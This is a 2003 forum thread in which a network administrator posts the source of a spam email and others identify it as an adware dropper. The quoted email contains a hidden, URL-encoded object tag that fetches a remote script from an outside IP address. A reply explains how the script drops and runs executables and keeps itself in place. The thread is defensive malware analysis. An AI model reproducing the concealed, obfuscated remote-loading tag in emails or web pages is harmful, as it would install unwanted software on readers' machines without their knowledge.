PC Review


Reply
Thread Tools Rate Thread

Weird mail trying top get "a.cgi", any ideas ?

 
 
Maxime Ducharme
Guest
Posts: n/a
 
      3rd Sep 2003

Hi,
I received a suspicious email which seems to be an exploit
of OE to infect people with a trojan or something like that.


Here's how the email source look like (I removed SMTP IPs & received
headers):

=================== BEGIN SOURCE =================
Message-ID: <h54$-9mutb8--6@qw4.3uoi56>
From: "Lorna Roach" <(E-Mail Removed)>
Reply-To: "Lorna Roach" <(E-Mail Removed)>
To: <(E-Mail Removed)>, <(E-Mail Removed)>
Subject: Hey
Date: Wed, 03 Sep 03 22:41:51 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="AF3E6...967056.7.08E03F7"
X-Priority: 3
X-MSMail-Priority: Normal
X-Return-Path: (E-Mail Removed)


--AF3E6...967056.7.08E03F7
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<head>
<div style=3D"display.none"><object data=3D"http://%363.2%346.=
%3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>
</head>
<body>
<p>Hey,</p>
<p>How have you been?&nbsp; What have you been doing lately?</p>
<p>Ive just been at home doing nothing bored at uni etc.</p>
<p>Anyway's lets catch up soon,</p>
<p>Luv,<br>You know who </p>
<p>&nbsp;</p>
</body>
</html>

--AF3E6...967056.7.08E03F7--
=================== END SOURCE =================


This code tries to download this file :

http://63.246.130.201/cgi-bin/a.cgi

This host doesnt answer my pings and his tcp port 80 is stealthed.

I didnt find anything on Google yet.

Someone recognize a virus in this or I am targeted by someone ?

I do not like the fact that the email is targeted at 2 specific address
of our organisation.

Thanks for any reply

---------------------------------------------------------------
Maxime Ducharme
Administrateur reseau, Programmeur
Pandore-Design [http://www.pandore-design.com]



 
Reply With Quote
 
 
 
 
Nick FitzGerald
Guest
Posts: n/a
 
      4th Sep 2003
"Maxime Ducharme" <(E-Mail Removed)> wrote:

I saw my first of these last night and have had a couple more reports
this morning...

> I received a suspicious email which seems to be an exploit
> of OE to infect people with a trojan or something like that.


Close, yes...

> Here's how the email source look like (I removed SMTP IPs & received
> headers):


If you would not mind, I'd like to know the originating IP (or mail server).
If' you'd rather not post it publicly, please send it to me via Email.

<<snip>>
> <head>
> <div style=3D"display.none"><object data=3D"http://%363.2%346.=
> %3130.2%30%31%2F%63g%69%2D%62i%6E%2Fa%2E%63%67%69"></object></div>


"URL escaped" encoding of a URl to a file called a.cgi which is a VBScript that
drops a small .EXE (named drg.exe) and runs it. drg.exe is a "downloader" that
pulls down a copy of the SurferBar IE toolbar and registers it via regsvr32.

In turn the toolbar drops another .EXE (winsvr32.exe) into "c:\program files"
(that path is hard-coded) and runs it. This .EXE is a "guardian" that runs a
10-second sleep loop making sure that its own auto-start and two of SurferBar's
registry configuration settings are present. The SurferBar toolbar also makes
a large nnumber of (pretty tastelessly named) shortcuts in your Start menu and
in the "Programs" sub-menu thereunder...

> This code tries to download this file :
>
> http://63.246.130.201/cgi-bin/a.cgi


Yep -- that's what the above encoded URL decodes to...

> This host doesnt answer my pings and his tcp port 80 is stealthed.


Yes -- it does seem rather dead now, but last night I could d/l that file and
the SurferBar toolbar .DLL the downloader is programmed to grab. The main
surferbar.com site (63.246.130.200) was pretty sad -- all the links were to
some other site (kanoodle.com ??) and were dead, much as www.surferbar.com
seems to be now... (Hopefully this means the hosting company has closed
surferbar.com down...)

> I didnt find anything on Google yet.


Try Google Groups and search for "surferbar". There were a couple of dozen hits
going back 2 or 3 days last night.

> Someone recognize a virus in this or I am targeted by someone ?


AFAICT, it is not viral, but this "seed" Email seems to have been quite widely
spammed.

> I do not like the fact that the email is targeted at 2 specific address
> of our organisation.


Huh???

> Thanks for any reply



--
Nick FitzGerald


 
Reply With Quote
 
 
 
 
Elson Mat
Guest
Posts: n/a
 
      4th Sep 2003
Try this info, symantec found it yesterday.

http://securityresponse.symantec.com...ad.aduent.troj
an.html


 
Reply With Quote
 
Lord Shaolin
Guest
Posts: n/a
 
      4th Sep 2003
"Elson Mat" <it.a.sankyu.com.hk> wrote in message
news:bj66pm$(E-Mail Removed)...
> Try this info, symantec found it yesterday.
>
>

http://securityresponse.symantec.com...ad.aduent.troj
> an.html
>
>


And Spybot S&D has been able to remove it for a while nasty thing that it
is.

--

-+ Shaolin +-
Discard what is useless, absorb what is not and
add what is uniquely your own.

.: http://www.security-forums.com :.


 
Reply With Quote
 
Maxime Ducharme
Guest
Posts: n/a
 
      4th Sep 2003

Thanks Nick, Elson & Lord for your answers

---------------------------------------------------------------
Maxime Ducharme
Administrateur reseau, Programmeur


"Lord Shaolin" <abuse@127.0.0.1> wrote in message
news:(E-Mail Removed)...
> "Elson Mat" <it.a.sankyu.com.hk> wrote in message
> news:bj66pm$(E-Mail Removed)...
> > Try this info, symantec found it yesterday.
> >
> >

>

http://securityresponse.symantec.com...ad.aduent.troj
> > an.html
> >
> >

>
> And Spybot S&D has been able to remove it for a while nasty thing that it
> is.
>
> --
>
> -+ Shaolin +-
> Discard what is useless, absorb what is not and
> add what is uniquely your own.
>
> .: http://www.security-forums.com :.
>
>



 
Reply With Quote
 
 
 
Reply

Thread Tools
Rate This Thread
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Get Error #13 when trying to use DDEINITIATE any ideas? KCFAAENGR Microsoft Access VBA Modules 3 6th Mar 2008 07:41 AM
weird weird weird... multiple text boxes alves Microsoft Powerpoint 6 12th Oct 2007 04:53 PM
My desk top has disappeared any ideas? =?Utf-8?B?andjaGV5ZW5uZQ==?= Windows XP Help 3 14th Nov 2005 11:40 PM
I'm trying to create a Stop watch program any ideas? =?Utf-8?B?RGFu?= Microsoft Access Database Table Design 1 19th Aug 2005 11:08 PM
Weird problem with a cheap Visioneer scanner. Any ideas? Brooks Moses Scanners 0 21st Feb 2004 08:36 PM


Features
 

Advertising
 

Newsgroups
 


All times are GMT +1. The time now is 01:22 AM.